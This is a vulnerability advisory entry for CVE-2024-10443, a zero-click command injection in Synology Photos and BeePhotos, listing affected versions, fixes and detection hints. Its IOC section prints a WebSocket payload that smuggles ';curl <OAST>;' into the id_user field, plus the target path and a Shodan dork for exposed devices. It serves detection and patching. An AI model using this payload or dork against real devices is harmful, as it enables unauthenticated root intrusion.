CVE-2024-10443
published 2024-11-15


Priority: P184 · critical 9.8 (CVSS 3.1)
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 28.38% (97.9th percentile)
Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.

Affected (8 ranges)

Vendor     Product          Version range        Fixed in
synology   beephotos        < 1.1.0-10053        1.1.0-10053
synology   beephotos        < 1.0.2-10026        1.0.2-10026
synology   beephotos        >= * < 1.1.0-10053   1.1.0-10053
synology   beephotos        >= * < 1.0.2-10026   1.0.2-10026
synology   photos           < 1.6.2-0720         1.6.2-0720
synology   photos           < 1.7.0-0795         1.7.0-0795
synology   synology_photos  >= * < 1.7.0-0795    1.7.0-0795
synology   synology_photos  >= * < 1.6.2-0720    1.6.2-0720

Detection & IOCs (extracted from sources)

url:      ws://[host]/FotoSocketIo/socket.io/?transport=websocket&EIO=4
path:     /FotoSocketIo/socket.io/
command:  42["page-view",{"id_user": ";curl <OAST>;", "timestamp": 0, "location": "xxd"}]
other:    shodan-query: html:"BeeStation"
  • Exploit arrives as an unauthenticated WebSocket connection to /FotoSocketIo/socket.io/?transport=websocket&EIO=4; monitor for WebSocket upgrade requests to this path from untrusted sources.
  • The injection is delivered inside the 'id_user' field of a 'page-view' WebSocket event (Socket.IO message type 42); alert on semicolon-delimited shell commands in that field.
  • The vulnerability is zero-click and requires no authentication; any inbound WebSocket connection to the Task Manager endpoint should be treated as suspicious on unpatched devices.
  • Use Shodan dork html:"BeeStation" to identify Internet-exposed vulnerable devices for proactive scanning and patching.
  • Exploitation results in code execution as root; look for unexpected outbound curl/DNS requests originating from the Synology Photos or BeePhotos process after a WebSocket page-view event.
  • Patches are NOT automatically applied; administrators must manually upgrade to the fixed versions to remediate the vulnerability.
  • The Nuclei PoC template requires the websocket-client Python package and Python 3 to be pre-installed on the system running the scanner.